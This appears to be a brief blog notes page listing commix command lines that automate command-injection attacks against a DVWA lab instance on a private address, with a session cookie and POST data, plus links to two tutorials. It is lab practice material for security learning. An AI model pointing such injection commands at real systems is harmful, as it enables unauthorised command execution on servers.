commix,useful
commix -u http://192.168.2.105:9079/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=263l880ue37mjt0e2h0fecled5; security=low' --data='ip=127.0.0.1&submit=submit'
commix -u http://192.168.2.105:9079/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=263l880ue37mjt0e2h0fecled5;security=low' --data='ip=127.0.0.1&Submit=Submit'
commix -u http://192.168.2.105:9079/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=263l880ue37mjt0e2h0fecled5; security=low' --data='ip=127.0.0.1;Submit=Submit'
commix -u http://192.168.2.105:9079/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=263l880ue37mjt0e2h0fecled5;security=low' --data='ip=127.0.0.1;Submit=Submit'
https://www.cnblogs.com/bonelee/p/11776067.html
https://null-byte.wonderhowto.com/how-to/use-commix-automate-exploiting-command-injection-flaws-web-applications-0189044/
浙公网安备 33010602011771号